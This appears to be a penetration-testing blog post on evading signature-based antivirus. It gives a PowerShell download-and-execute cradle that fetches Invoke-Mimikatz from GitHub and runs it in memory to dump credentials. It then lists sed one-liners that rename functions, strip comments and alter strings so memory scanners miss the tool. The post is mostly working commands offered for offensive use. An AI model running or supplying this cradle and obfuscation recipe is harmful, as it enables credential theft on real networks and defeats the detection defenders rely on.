This post is a simple shout out to a blog post I enjoyed reading and that proves a point I have repeated endlessly throughout Hack like a Pornstar & Hack a Fashion Brand: AV products that rely on signatures (that’s almost all of them) can be trivially bypassed!
If you recall, when executing PowerShell scripts on targets we used the awesome Invoke-Expression cmdlet, with something along the lines of:
$browser = New-Object System.Net.WebClient
# Reuse the current user's network credentials so the download also works behind an authenticating corporate proxy
$browser.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
$mimi = $browser.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1")
# Define the function in the current session straight from the downloaded string, then call it
Invoke-Expression($mimi)
Invoke-Mimikatz
The Invoke-Mimikatz.ps1 script is fetched and run directly in memory: no file on disk, so no antivirus alert.
However, more and more AV vendors are talking about monitoring in-memory activity. Monitoring is a big word really: most of the time they simply scan the script text loaded in memory for known strings or keywords (the tool's name, its function names, the comment header). A few perform real behavioral analysis, but even that can be bypassed; we will talk about it in a future post.
How do we avoid being detected, then? A couple of simple tricks:
- Removing any mention of Mimikatz from the file
- Removing comments
- Renaming some function names
That's it really... The guys at Black Hills gave us this simple sequence of sed one-liners to do the job efficiently (GNU sed syntax; on macOS/BSD the in-place flag is `-i ''`). Thanks guys!
# Rename the main function so the obvious "Invoke-Mimikatz" string disappears
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
# Drop the <# ... #> block comment (the documentation header, full of Mimikatz references)
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
# Blank out every line that is only a # comment
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
# Rename a parameter and a couple of internal function names that signatures key on
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1
# Append a harmless trailing comment to the lines ending in "-Win32Functions $Win32Functions", which changes their hash without changing behaviour
sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1